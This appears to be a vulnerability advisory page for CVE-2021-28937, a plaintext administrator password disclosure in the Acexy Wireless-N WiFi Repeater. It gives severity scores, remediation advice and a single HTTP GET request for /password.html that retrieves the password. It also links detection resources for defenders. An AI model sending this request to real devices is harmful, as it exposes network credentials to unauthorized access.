🔙 목록으로 돌아가기

CVE-2021-28937: Acexy Wireless-N WiFi Repeater REV 1.0 - Repeater Password Disclosure

TitleAcexy Wireless-N WiFi Repeater REV 1.0 - Repeater Password Disclosure
Authorgeeknik
SeverityHigh
ImpactAn attacker can obtain the repeater's password, compromising the security of the network.
RemediationUpdate the firmware to the latest version or replace the vulnerable repeater with a secure alternative.
CVSS Score7.5
EPSS Score0.33834
CVE IDCVE-2021-28937
CWE IDCWE-312
Tags cve2021 cve acexy disclosure iot vuln

🔍 Vulnerability Description

Acexy Wireless-N WiFi Repeater REV 1.0 is vulnerable to password disclosure because the password.html page of the web management interface contains the administrator account password in plaintext.

🌐 HTTP Request

GET /password.html HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-28937.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-28937.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A